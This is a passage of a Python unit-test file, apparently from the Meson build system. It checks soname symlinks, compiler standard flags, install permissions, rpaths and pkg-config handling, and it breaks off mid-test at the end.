testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
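        # Build (and optionally install) the '1 soname' project, then verify the
        # symlink layout and SONAME for each version/soversion combination.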
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
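        # Exercise every -std= value the compiler object offers (skipping ones the
        # detected compiler version cannot handle), confirm the flag appears in the
        # compile command, then check that a bogus -std= in the environment fails.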
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
            if v != 'none' and (compiler.get_id(), v) not in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
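        # With --unity=subprojects, unity sources are generated for subproject
        # targets only, not for the main project's 'user' executable.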
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
        install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
        self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
        '''
        Check that a pkg-config file installed for a static library built by
        Meson can be used to build another project against that library.
        '''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_secondary_dependencies(self):
'''
Check that Meson gets -Wl,-rpath-link right for secondary dependencies
This test requires at least two libraries, as -Wl,-rpath-link is only
required for dependencies of dependencies (i.e. secondary dependencies).
'''
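        # Background (added for clarity): when the app links against libB and
        # libB itself links against libA, the linker needs -Wl,-rpath-link to
        # locate libA at link time even though the app never references libA
        # directly; that is the scenario the three builds below construct.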
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 rpath-link secondary')
# build libA
testdirlibA = os.path.join(testdirbase, 'libA')
testlibAprefix = os.path.join(tempdirname, 'libAprefix')
self.init(testdirlibA, extra_args=['--prefix=' + testlibAprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False)
self.build()
self.install(use_destdir=False)
# build libB (uses libA)
pkg_dir = [os.path.join(testlibAprefix, 'lib/pkgconfig')]
self.new_builddir()
testdirlibB = os.path.join(testdirbase, 'libB')
testlibBprefix = os.path.join(tempdirname, 'libBprefix')
self.init(testdirlibB, extra_args=['--prefix=' + testlibBprefix,
'--libdir=lib',
'--default-library=shared'], default_args=False,
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
self.install(use_destdir=False)
# build executable (uses libB, secondary dependency on libA)
pkg_dir.append(os.path.join(testlibBprefix, 'lib/pkgconfig'))
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': ':'.join(pkg_dir)})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '68 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
            # On Windows, macOS, Cygwin and OpenBSD, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
        PkgConfigDependency) works. On macOS, running the installed binaries
        works out of the box. On Linux, BSDs, Windows, etc., you need to set
        extra variables such as LD_LIBRARY_PATH, so the post-install part of
        this test only runs on macOS.
The system library is found with cc.find_library() and pkg-config deps.
'''
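        # Workflow sketch (added for clarity): first build and install the
        # "external library" project into self.installdir, then point
        # LIBRARY_PATH / PKG_CONFIG_PATH at it and build the "built library"
        # consumer against it, running its tests uninstalled; the
        # install_name / rpath checks at the end are macOS-only.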
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
